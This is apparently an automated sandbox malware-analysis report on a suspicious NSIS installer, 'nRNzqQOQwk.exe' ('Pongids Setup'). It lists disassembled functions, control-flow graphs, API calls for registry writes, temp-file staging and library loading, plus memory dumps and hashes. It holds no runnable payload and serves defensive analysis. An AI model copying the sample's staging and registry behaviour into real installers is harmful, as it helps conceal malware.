                                                                            control_flow_graph 689 402f33-402f47 690 402f50-402f59 689->690 691 402f49 689->691 692 402f62-402f67 690->692 693 402f5b 690->693 691->690 694 402f77-402f84 call 403122 692->694 695 402f69-402f72 call 403138 692->695 693->692 699 403110 694->699 700 402f8a-402f8e 694->700 695->694 701 403112-403113 699->701 702 402f94-402fba GetTickCount 700->702 703 4030bb-4030bd 700->703 706 40311b-40311f 701->706 707 402fc0-402fc8 702->707 708 403118 702->708 704 4030fd-403100 703->704 705 4030bf-4030c2 703->705 711 403102 704->711 712 403105-40310e call 403122 704->712 705->708 713 4030c4 705->713 709 402fca 707->709 710 402fcd-402fdb call 403122 707->710 708->706 709->710 710->699 722 402fe1-402fea 710->722 711->712 712->699 723 403115 712->723 716 4030c7-4030cd 713->716 719 4030d1-4030df call 403122 716->719 720 4030cf 716->720 719->699 726 4030e1-4030ed call 405aba 719->726 720->719 725 402ff0-403010 call 40621c 722->725 723->708 731 4030b3-4030b5 725->731 732 403016-403029 GetTickCount 725->732 733 4030b7-4030b9 726->733 734 4030ef-4030f9 726->734 731->701 735 40302b-403033 732->735 736 40306e-403070 732->736 733->701 734->716 737 4030fb 734->737 738 403035-403039 735->738 739 40303b-40306b MulDiv wsprintfA call 404fb9 735->739 740 403072-403076 736->740 741 4030a7-4030ab 736->741 737->708 738->736 738->739 739->736 742 403078-40307f call 405aba 740->742 743 40308d-403098 740->743 741->707 744 4030b1 741->744 749 403084-403086 742->749 747 40309b-40309f 743->747 744->708 747->725 750 4030a5 747->750 749->733 751 403088-40308b 749->751 750->708 751->747
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CountTick$wsprintf
                                                                            • String ID: ... %d%%
                                                                            • API String ID: 551687249-2449383134
                                                                            • Opcode ID: 85c538cc075ba04794855290aa18cdf04ceba737772e139ba8f68ecbd5a835b1
                                                                            • Instruction ID: c8fbb3e8d9104581ad396ff7879acfc5b753e67115e275f424ba67d933986381
                                                                            • Opcode Fuzzy Hash: 85c538cc075ba04794855290aa18cdf04ceba737772e139ba8f68ecbd5a835b1
                                                                            • Instruction Fuzzy Hash: 6551A27280121AABCB10DF65DA44A9F7BB8EF44756F10413BF800B72C5C7788E51DBAA
                                                                            Function 004023D3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73registrystringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 752 4023d3-402419 call 402bc3 call 402ace * 2 RegCreateKeyExA 759 40295e-40296d 752->759 760 40241f-402427 752->760 762 402437-40243a 760->762 763 402429-402436 call 402ace lstrlenA 760->763 764 40243c-40244d call 402aac 762->764 765 40244e-402451 762->765 763->762 764->765 770 402462-402476 RegSetValueExA 765->770 771 402453-40245d call 402f33 765->771 774 402478 770->774 775 40247b-402555 RegCloseKey 770->775 771->770 774->775 775->759 777 402729-402730 775->777 777->759
                                                                            APIs
                                                                            • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402411
                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj1A28.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402431
                                                                            • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsj1A28.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040246E
                                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj1A28.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040254F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateValuelstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsj1A28.tmp
                                                                            • API String ID: 1356686001-3228911402
                                                                            • Opcode ID: 2eae85450b92eca2a3c37eaf8981f1ba2892586689a29081bc0333428de2e0a2
                                                                            • Instruction ID: 00e854f1b6d20388f4b464fcc1b804607db5fe0ac9957b4d3390b69bb90c797e
                                                                            • Opcode Fuzzy Hash: 2eae85450b92eca2a3c37eaf8981f1ba2892586689a29081bc0333428de2e0a2
                                                                            • Instruction Fuzzy Hash: 3921A1B1E00109BEEB00EFA4DE49EAF7A78EB50358F20403AF505B61D1C6B85D019B28
                                                                            Function 00405A42 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 778 405a42-405a4c 779 405a4d-405a78 GetTickCount GetTempFileNameA 778->779 780 405a87-405a89 779->780 781 405a7a-405a7c 779->781 783 405a81-405a84 780->783 781->779 782 405a7e 781->782 782->783
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00405A56
                                                                            • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405A70
                                                                            Strings
                                                                            • nsa, xrefs: 00405A4D
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A45
                                                                            • "C:\Users\user\Desktop\nRNzqQOQwk.exe", xrefs: 00405A42
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CountFileNameTempTick
                                                                            • String ID: "C:\Users\user\Desktop\nRNzqQOQwk.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                            • API String ID: 1716503409-4049198600
                                                                            • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                            • Instruction ID: a3d8867ec022398f00e7cc0b64f9ef92c2764b579e17a6718397eb4594f2c545
                                                                            • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                            • Instruction Fuzzy Hash: 07F0E2327082047BDB108F55EC44B9B7B9CDF91750F10C037FE049A180D2B198448F59
                                                                            Function 100016BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 802 100016bd-100016f9 call 10001a5d 806 1000180a-1000180c 802->806 807 100016ff-10001703 802->807 808 10001705-1000170b call 100021b0 807->808 809 1000170c-10001719 call 100021fa 807->809 808->809 814 10001749-10001750 809->814 815 1000171b-10001720 809->815 816 10001770-10001774 814->816 817 10001752-1000176e call 100023da call 10001559 call 10001266 GlobalFree 814->817 818 10001722-10001723 815->818 819 1000173b-1000173e 815->819 823 100017b2-100017b8 call 100023da 816->823 824 10001776-100017b0 call 10001559 call 100023da 816->824 839 100017b9-100017bd 817->839 821 10001725-10001726 818->821 822 1000172b-1000172c call 100027e8 818->822 819->814 825 10001740-10001741 call 10002aa3 819->825 827 10001733-10001739 call 10002589 821->827 828 10001728-10001729 821->828 834 10001731 822->834 823->839 824->839 837 10001746 825->837 843 10001748 827->843 828->814 828->822 834->837 837->843 844 100017fa-10001801 839->844 845 100017bf-100017cd call 100023a0 839->845 843->814 844->806 850 10001803-10001804 GlobalFree 844->850 852 100017e5-100017ec 845->852 853 100017cf-100017d2 845->853 850->806 852->844 855 100017ee-100017f9 call 100014e2 852->855 853->852 854 100017d4-100017dc 853->854 854->852 856 100017de-100017df FreeLibrary 854->856 855->844 856->852
                                                                            APIs
                                                                              • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                              • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                              • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001768
                                                                            • FreeLibrary.KERNEL32(?), ref: 100017DF
                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                              • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                                                              • Part of subcall function 10002589: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB
                                                                              • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13435297109.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000000.00000002.13435257498.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13435328393.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13435360317.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_10000000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                            • String ID:
                                                                            • API String ID: 1791698881-3916222277
                                                                            • Opcode ID: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                                            • Instruction ID: 7bd52774c71d274dd6e07030a7ef65efb9a892d3f5f2eddd47f658e3267813e4
                                                                            • Opcode Fuzzy Hash: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                                            • Instruction Fuzzy Hash: B5319C79408205DAFB41DF649CC5BCA37ECFF042D5F018465FA0A9A09EDF78A8858B60
                                                                            Function 00405900 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 859 405900-40591b call 405da0 call 4058ab 864 405921-40592e call 40600b 859->864 865 40591d-40591f 859->865 869 405930-405934 864->869 870 40593a-40593c 864->870 866 405973-405975 865->866 869->865 871 405936-405938 869->871 872 405952-40595b lstrlenA 870->872 871->865 871->870 873 40595d-405971 call 405812 GetFileAttributesA 872->873 874 40593e-405945 call 4060a4 872->874 873->866 879 405947-40594a 874->879 880 40594c-40594d call 405859 874->880 879->865 879->880 880->872
                                                                            APIs
                                                                              • Part of subcall function 00405DA0: lstrcpynA.KERNEL32(?,?,00000400,0040322E,Pongids Setup,NSIS Error), ref: 00405DAD
                                                                              • Part of subcall function 004058AB: CharNextA.USER32(?,?,C:\,?,00405917,C:\,C:\,765F3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,765F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B9
                                                                              • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058BE
                                                                              • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058D2
                                                                            • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,765F3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,765F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405953
                                                                            • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,765F3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,765F3410,C:\Users\user\AppData\Local\Temp\), ref: 00405963
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                            • String ID: C:\$C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 3248276644-2214159804
                                                                            • Opcode ID: 2b232cbcfe35a2a259e0e65083c3ab1013c8774cdbeba63489dc7f6696da3121
                                                                            • Instruction ID: 7328fd33adb38864c40c3ad9044401c3b5e3aae7bd0e1b9e961d96be1e2df883
                                                                            • Opcode Fuzzy Hash: 2b232cbcfe35a2a259e0e65083c3ab1013c8774cdbeba63489dc7f6696da3121
                                                                            • Instruction Fuzzy Hash: D5F0A466115D6096D722333A1C05B9F1A48CEC2374759453BF891F12D2DB3C8953DD7E
                                                                            Function 00401FFF Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 0040202A
                                                                              • Part of subcall function 00404FB9: lstrlenA.KERNEL32(0079DD20,00000000,0078FCF8,765F23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000,?), ref: 00404FF2
                                                                              • Part of subcall function 00404FB9: lstrlenA.KERNEL32(0040306B,0079DD20,00000000,0078FCF8,765F23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000), ref: 00405002
                                                                              • Part of subcall function 00404FB9: lstrcatA.KERNEL32(0079DD20,0040306B,0040306B,0079DD20,00000000,0078FCF8,765F23A0), ref: 00405015
                                                                              • Part of subcall function 00404FB9: SetWindowTextA.USER32(0079DD20,0079DD20), ref: 00405027
                                                                              • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040504D
                                                                              • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405067
                                                                              • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405075
                                                                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040203A
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0040204A
                                                                            • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                            • String ID:
                                                                            • API String ID: 2987980305-0
                                                                            • Opcode ID: dcd88b9650ca2fc532c8c5fc9ad8650594621bf6dfbf7b98fc17d5296bd1316f
                                                                            • Instruction ID: 6acd92e4f6ebcd949653744c87f359efbc1ef98484dd96508818b65b31ed9250
                                                                            • Opcode Fuzzy Hash: dcd88b9650ca2fc532c8c5fc9ad8650594621bf6dfbf7b98fc17d5296bd1316f
                                                                            • Instruction Fuzzy Hash: 5921F671E00225EBDF307FA48F48AAE7A706B45354F20023BF701B22D1C6BE4A42D65E
                                                                            Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004058AB: CharNextA.USER32(?,?,C:\,?,00405917,C:\,C:\,765F3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,765F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B9
                                                                              • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058BE
                                                                              • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058D2
                                                                            • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                              • Part of subcall function 0040547F: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004054C2
                                                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\slavelivets,00000000,00000000,000000F0), ref: 0040163C
                                                                            Strings
                                                                            • C:\Users\user\slavelivets, xrefs: 00401631
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                            • String ID: C:\Users\user\slavelivets
                                                                            • API String ID: 1892508949-1403250623
                                                                            • Opcode ID: 180f8dbed9302a858d7acc3d4175b887fc009ffc70d4c8ebc0bf4da9f8c84f7e
                                                                            • Instruction ID: f4e9a0c94948f709858838e9eb50a0f2792b4ff72a3a1ac07d5dbe4c8cdc963c
                                                                            • Opcode Fuzzy Hash: 180f8dbed9302a858d7acc3d4175b887fc009ffc70d4c8ebc0bf4da9f8c84f7e
                                                                            • Instruction Fuzzy Hash: D3112731508052EBDB217BB54D409BF26B09E92324B28457FF8D2B22E2D63D4D43A63F
                                                                            Function 00405C87 Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExA.KERNELBASE(80000002,00405ECC,00000000,00000002,?,00000002,0008C66D,?,00405ECC,80000002,Software\Microsoft\Windows\CurrentVersion,0008C66D,Call,0082E5E5), ref: 00405CB0
                                                                            • RegQueryValueExA.KERNELBASE(0008C66D,?,00000000,00405ECC,0008C66D,00405ECC), ref: 00405CD1
                                                                            • RegCloseKey.KERNELBASE(?), ref: 00405CF2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
